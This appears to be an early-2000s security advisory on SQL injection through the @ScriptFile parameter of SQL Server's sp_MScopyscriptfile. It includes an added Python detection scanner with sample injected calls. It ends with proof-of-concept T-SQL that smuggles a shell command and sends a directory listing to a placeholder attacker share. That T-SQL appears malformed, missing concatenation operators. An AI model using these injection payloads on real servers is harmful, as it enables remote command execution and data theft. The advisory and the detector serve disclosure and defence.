Published: 2002-07-27
Updated: 2002-07-27
Severity: High
Threat: Remote administrator privileges
Error type: Input validation error
Exploit method: Server mode
Bugtraq ID: 5309
CVE (CAN) ID: CVE-2001-0645
Affected systems
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6A
Microsoft SQL Server 2000
- Microsoft Windows 2000 Workstation
- Microsoft Windows 2000 Workstation SP1
- Microsoft Windows 2000 Workstation SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6A
Microsoft SQL Server 2000 Desktop Engine
Microsoft Visio Enterprise Network Tools
Detailed Description
Microsoft SQL Server 2000 ships with two replication stored procedures that do not validate their input. An attacker who can supply crafted parameters to these stored procedures can cause arbitrary commands to be executed.
The sp_MScopyscriptfile stored procedure is one of the stored procedures used by replication, and it contains a SQL injection vulnerability. sp_MScopyscriptfile creates the directory used by SQL Server replication and copies a script file into it; its input parameter @ScriptFile is the name of the script file to copy. Operating-system commands can be injected through this parameter, and they are then executed via xp_cmdshell.
To exploit this vulnerability successfully, the attacker needs a SQL Server Agent proxy account, which is not enabled by default.
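As an added detection example (not part of the advisory), the following Python scan flags sp_MScopyscriptfile calls whose @ScriptFile argument carries shell metacharacters, resolving the variable indirection used in the test code below; the SAMPLE_TRACE lines are constructed, not captured data.

```python
import re

# Shell metacharacters that have no place in a script file name passed to
# sp_MScopyscriptfile; their presence means the argument is being used to
# smuggle a command into the xp_cmdshell call the procedure builds.
SHELL_META = re.compile(r"[|&<>^]|\bxp_cmdshell\b", re.IGNORECASE)

# Matches "EXEC[UTE] [schema.]sp_MScopyscriptfile <first argument>" and
# captures the first argument (a quoted literal or a @variable).
CALL = re.compile(
    r"\bexec(?:ute)?\s+(?:\w+\.)?sp_MScopyscriptfile\s+"
    r"(?P<arg>N?'(?:[^']|'')*'|@\w+)",
    re.IGNORECASE)

# Matches "SELECT @var = '...'" / "SET @var = '...'" assignments.
ASSIGN = re.compile(
    r"\b(?:select|set)\s+(?P<name>@\w+)\s*=\s*'(?P<val>(?:[^']|'')*)'",
    re.IGNORECASE)

def first_argument(statement):
    """Return the raw first argument of an sp_MScopyscriptfile call, or None."""
    m = CALL.search(statement)
    return m.group("arg") if m else None

def is_suspicious(statement, variables=None):
    """True when the call's @ScriptFile value contains shell metacharacters.
    `variables` maps lower-cased @name -> literal value so that calls made
    through a variable (as in the advisory's test code) can be resolved."""
    arg = first_argument(statement)
    if arg is None:
        return False
    if arg.startswith("@"):
        arg = (variables or {}).get(arg.lower(), "")
    return bool(SHELL_META.search(arg))

def scan(trace_lines):
    """Return the trace lines that call sp_MScopyscriptfile with an injected command."""
    variables = {}
    hits = []
    for line in trace_lines:
        for m in ASSIGN.finditer(line):
            variables[m.group("name").lower()] = m.group("val")
        if is_suspicious(line, variables):
            hits.append(line)
    return hits

# Constructed sample trace lines (not real captured data).
SAMPLE_TRACE = [
    "exec sp_MScopyscriptfile 'snapshot.sql', 'C:\\Repl\\unc'",
    "select @f = 'x.sql | xp_cmdshell ''dir'' --'",
    "EXEC dbo.sp_MScopyscriptfile @f, ''",
    "exec sp_MScopyscriptfile 'a.sql > NUL & whoami', ''",
]
```

Running `scan(SAMPLE_TRACE)` returns the third and fourth lines; the first call uses a plain file name and is left alone.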
Test code
Declare @command varchar(100)
Declare @scripfile varchar(200)
Set concat_null_yields_null off
SELECT @command = 'DIR C:\ > "\\attackerip\share\dir.txt" "
SELECT @scripfile = 'c:\autoexec.bat > NUL "|' @command '| RD "
EXEC sp_MScopyscriptfile @scripfile, ''